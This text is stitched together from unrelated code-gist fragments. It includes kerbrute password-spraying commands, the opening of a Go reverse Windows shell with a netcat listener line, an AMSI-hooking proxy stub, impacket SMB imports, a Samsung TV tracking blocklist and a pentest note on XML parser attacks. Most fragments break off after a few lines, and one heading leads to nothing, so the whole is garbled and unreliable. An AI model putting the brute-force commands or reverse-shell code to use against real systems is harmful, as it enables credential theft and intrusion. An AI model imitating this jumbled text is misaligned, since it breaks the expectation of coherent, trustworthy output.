With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
@Library('ci-jenkins-common') _ | |
// Jenkins build pipeline (declarative) | |
// Project: Seatbelt | |
// URL: https://github.com/GhostPack/Seatbelt | |
// Author: @tifkin_/@harmj0y | |
// Pipeline Author: harmj0y | |
def gitURL = "https://github.com/GhostPack/Seatbelt" |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace EtwpTest | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ |
<# | |
.Synopsis | |
Functions for working with Process monitor | |
.Link | |
https://docs.microsoft.com/en-us/sysinternals/downloads/procmon | |
#> | |
#Requires -Version 3.0 | |
New-Module -Name Procmon -Scriptblock { |
# This is a blocklist to block samsung smart tv's sending meta data at home. | |
# Please help to collect domains! | |
# It could be that the TV does not receive any more updates or other services no longer work. Please report such an incident. | |
abtauthprd.samsungcloudsolution.com | |
acr0.samsungcloudsolution.com | |
ad.samsungadhub.com | |
ads.samsungads.com | |
amauthprd.samsungcloudsolution.com | |
api-hub.samsungyosemite.com |
from impacket.smbconnection import SMBConnection, SessionError | |
from impacket.smb3structs import FILE_READ_DATA | |
from time import strftime, localtime | |
import re | |
import logging | |
log = logging.getLogger() | |
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', | |
level=logging.DEBUG, datefmt='%I:%M:%S') |
EXE = shell | |
SRC = . | |
LDFLAGS = -ldflags="-s -w" | |
windows: | |
GOOS=windows go build -o $(EXE)_win.exe $(LDFLAGS) $(SRC) | |
macos: | |
GOOS=darwin go build -o $(EXE)_macos $(LDFLAGS) $(SRC) |
// +build windows | |
// Reverse Windows CMD | |
// Test with nc -lvvp 6666 | |
package main | |
import ( | |
"bufio" | |
"net" | |
"os/exec" |
import sys | |
import windows | |
import windows.winproxy | |
import windows.generated_def as gdef | |
class AMSIProxy(windows.winproxy.ApiProxy): | |
APIDLL = "Amsi" | |
default_error_check = staticmethod(windows.winproxy.no_error_check) | |
""" |
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.